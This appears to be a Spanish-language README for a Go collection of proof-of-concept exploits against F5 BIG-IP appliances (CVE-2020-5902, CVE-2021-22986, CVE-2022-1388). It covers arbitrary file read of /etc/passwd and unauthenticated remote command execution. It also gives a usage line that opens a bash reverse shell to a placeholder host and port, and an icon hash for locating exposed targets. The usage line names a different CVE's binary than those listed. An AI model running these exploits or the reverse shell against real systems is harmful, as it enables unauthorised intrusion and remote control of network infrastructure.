
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 Colección de POCs
Colección de POC escrita en Go para CVE-2020-5902, CVE-2021-22986, CVE-2022-1388. Se añadirán otros POC de F5 en el futuro.
author:160team.west9B
Solo para uso por parte de investigadores de seguridad bajo autorización. Cumpla con la ley de ciberseguridad. Cualquier problema o consecuencia es responsabilidad del usuario, no del autor.
Colección de POC de F5:
CVE-2020-5902: Vulnerabilidad de ejecución remota de código en F5 BIG-IP
CVE-2021-22986: Vulnerabilidad de ejecución remota de comandos no autorizada en iControl REST de F5 BIG-IP
CVE-2022-1388: Ejecución remota de comandos mediante evasión de autenticación
CVE-2020-5902 verifica mediante descarga de archivos arbitrarios. Si devuelve /etc/passwd, la vulnerabilidad existe.
Los POC de CVE-2021-22986 y CVE-2022-1388 ejecutan el comando id por defecto. Si devuelve {id}, la vulnerabilidad existe. Se puede usar -c para comandos personalizados.
usage: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

icon_hash="-335242539"